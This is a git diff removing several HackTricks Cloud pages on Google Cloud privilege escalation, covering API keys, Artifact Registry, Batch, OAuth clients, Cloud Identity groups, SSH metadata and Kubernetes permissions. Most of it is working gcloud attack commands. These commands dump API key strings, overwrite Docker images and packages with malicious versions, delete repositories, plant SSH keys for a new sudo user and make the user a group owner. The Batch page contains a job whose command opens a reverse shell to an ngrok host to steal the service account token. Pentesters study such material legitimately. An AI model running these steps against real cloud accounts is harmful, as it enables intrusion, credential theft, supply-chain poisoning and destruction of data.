- -{% hint style="danger" %} -Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**. -{% endhint %} - -### `apikeys.keys.getKeyString` , `apikeys.keys.list` - -These permissions allows **list and get all the apiKeys and get the Key**: - -```bash -for key in $(gcloud services api-keys list --uri); do - gcloud services api-keys get-key-string "$key" -done -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). - -### `apikeys.keys.undelete` , `apikeys.keys.list` - -These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: - -```bash -gcloud services api-keys list --show-deleted -gcloud services api-keys undelete -``` - -### Create Internal OAuth Application to phish other workers - -Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): - -{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md deleted file mode 100644 index 9d868f485..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md +++ /dev/null @@ -1,210 +0,0 @@ -# GCP - Artifact Registry Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### artifactregistry.repositories.uploadArtifacts - -With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images: - -{% code overflow="wrap" %} -```bash -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# tag the image to upload it -docker tag : -docker.pkg.dev///: - -# Upload it -docker push -docker.pkg.dev///: -``` -{% endcode %} - -{% hint style="danger" %} -It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded. -{% endhint %} - -
- -Upload a Python library - -**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step): - -1. **Set up your project structure**: - - * Create a new directory for your library, e.g., `hello_world_library`. - * Inside this directory, create another directory with your package name, e.g., `hello_world`. - * Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package. - - ```bash - mkdir hello_world_library - cd hello_world_library - mkdir hello_world - touch hello_world/__init__.py - ``` -2. **Write your library code**: - - * Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`. - * Write your "Hello, World!" function: - - ```python - # hello_world/greet.py - def say_hello(): - return "Hello, World!" - ``` -3. **Create a `setup.py` file**: - - * In the root of your `hello_world_library` directory, create a `setup.py` file. - * This file contains metadata about your library and tells Python how to install it. - - ```python - # setup.py - from setuptools import setup, find_packages - - setup( - name='hello_world', - version='0.1', - packages=find_packages(), - install_requires=[ - # Any dependencies your library needs - ], - ) - ``` - -**Now, lets upload the library:** - -1. **Build your package**: - - * From the root of your `hello_world_library` directory, run: - - ```sh - python3 setup.py sdist bdist_wheel - ``` -2. **Configure authentication for twine** (used to upload your package): - * Ensure you have `twine` installed (`pip install twine`). - * Use `gcloud` to configure credentials: - -{% code overflow="wrap" %} -```` -```sh -twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* -``` -```` -{% endcode %} - -3. **Clean the build** - -```bash -rm -rf dist build hello_world.egg-info -``` - -
- -{% hint style="danger" %} -It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:** - -{% code overflow="wrap" %} -```sh -gcloud artifacts versions delete --repository= --location= --package= -``` -{% endcode %} -{% endhint %} - -### `artifactregistry.repositories.downloadArtifacts` - -With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**. - -Download a **Docker** image: - -```sh -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# Dowload image -docker pull -docker.pkg.dev///: -``` - -Download a **python** library: - -{% code overflow="wrap" %} -```bash -pip install --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir -``` -{% endcode %} - -* What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? 
Check this page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`) - -Delete artifacts from the registry, like docker images: - -{% code overflow="wrap" %} -```bash -# Delete a docker image -gcloud artifacts docker images delete -docker.pkg.dev///: -``` -{% endcode %} - -### `artifactregistry.repositories.delete` - -Detele a full repository (even if it has content): - -{% code overflow="wrap" %} -``` -gcloud artifacts repositories delete --location= -``` -{% endcode %} - -### `artifactregistry.repositories.setIamPolicy` - -An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks. - -### Pivoting to other Services through Artifact Registry Read & Write - -* **Cloud Functions** - -When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**. - -* **App Engine** - -Even though App Engine creates docker images inside Artifact Registry. 
It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ -It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md deleted file mode 100644 index 7f41fa8b8..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md +++ /dev/null @@ -1,84 +0,0 @@ -# GCP - Batch Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Batch - -Basic information: - -{% content-ref url="../gcp-services/gcp-batch-enum.md" %} -[gcp-batch-enum.md](../gcp-services/gcp-batch-enum.md) -{% endcontent-ref %} - -### `batch.jobs.create`, `iam.serviceAccounts.actAs` - -It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default). - -```bash -gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" - } - } - ], - "volumes": [] - } - } - ], - "allocationPolicy": { - "instances": [ - { - "policy": { - "provisioningModel": "STANDARD", - "machineType": "e2-micro" - } - } - ] - }, - "logsPolicy": { - "destination": "CLOUD_LOGGING" - } -} -EOD -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md deleted file mode 100644 index d8c3facd3..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - ClientAuthConfig Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Create OAuth Brand and Client - -[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions: - -* `clientauthconfig.brands.list` -* `clientauthconfig.brands.create` -* `clientauthconfig.brands.get` -* `clientauthconfig.clients.create` -* `clientauthconfig.clients.listWithSecrets` -* `clientauthconfig.clients.getWithSecret` -* `clientauthconfig.clients.delete` -* `clientauthconfig.clients.update` - -{% code overflow="wrap" %} -```bash -# Create a brand -gcloud iap oauth-brands list -gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL -# Create a client of the brand -gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md deleted file mode 100644 index 3d7d16fef..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloudidentity Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloudidentity - -For more information about the cloudidentity service, check this page: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Add yourself to a group - -If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: - -{% code overflow="wrap" %} -```bash -gcloud identity groups memberships add --group-email --member-email [--roles OWNER] -# If --roles isn't specified you will get MEMBER -``` -{% endcode %} - -### Modify group membership - -If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: - -{% code overflow="wrap" %} -```bash -# Check the current membership level -gcloud identity groups memberships describe --member-email --group-email - -# If not OWNER try -gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md deleted file mode 100644 index c762f6c84..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Add Custom SSH Metadata - -## GCP - Add Custom SSH Metadata - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -#### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -#### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - * Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - * Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. -2. **Prepare a Text File for SSH Key Metadata:** - * Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. 
**Generate a New SSH Key for the Target User (`alice` in this example):** - * Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - * Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. -4. **Update the Instance's SSH Key Metadata:** - * Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` -5. **Access the Instance Using the New SSH Key:** - * Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -#### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -#### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. 
**Apply SSH Keys at the Project Level:** - * Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` -2. **SSH into Instances Using Project-Wide Keys:** - * With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - * A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md deleted file mode 100644 index 0599a6328..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md +++ /dev/null @@ -1,118 +0,0 @@ -# GCP - Container Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## container - -### `container.clusters.get` - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. -{% endhint %} - -If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this: - -```yaml -apiVersion: v1 -clusters: -- cluster: - certificate-authority-data: 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 - server: https://34.123.141.28 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -contexts: -- context: - cluster: gke_security-devbox_us-central1_autopilot-cluster-1 - user: gke_security-devbox_us-central1_autopilot-cluster-1 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -current-context: gke_security-devbox_us-central1_autopilot-cluster-1 -kind: Config -preferences: {} -users: -- name: gke_security-devbox_us-central1_autopilot-cluster-1 - user: - auth-provider: - config: - access-token: - cmd-args: config config-helper --format=json - cmd-path: gcloud - expiry: "2022-12-06T01:13:11Z" - expiry-key: '{.credential.token_expiry}' - token-key: '{.credential.access_token}' - name: gcp -``` - -### `container.roles.escalate` | `container.clusterRoles.escalate` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. 
However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions. - -### `container.roles.bind` | `container.clusterRoles.bind` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions. - -### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update` - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. 
Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -### `container.secrets.get` | `container.secrets.list` - -As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -### `container.pods.exec` - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -### `container.pods.portForward` - -As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -### `container.serviceAccounts.createToken` - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. 
- -### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update` - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md deleted file mode 100644 index 38c2f36ce..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md +++ /dev/null @@ -1,55 +0,0 @@ -# GCP - Deploymentmaneger Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
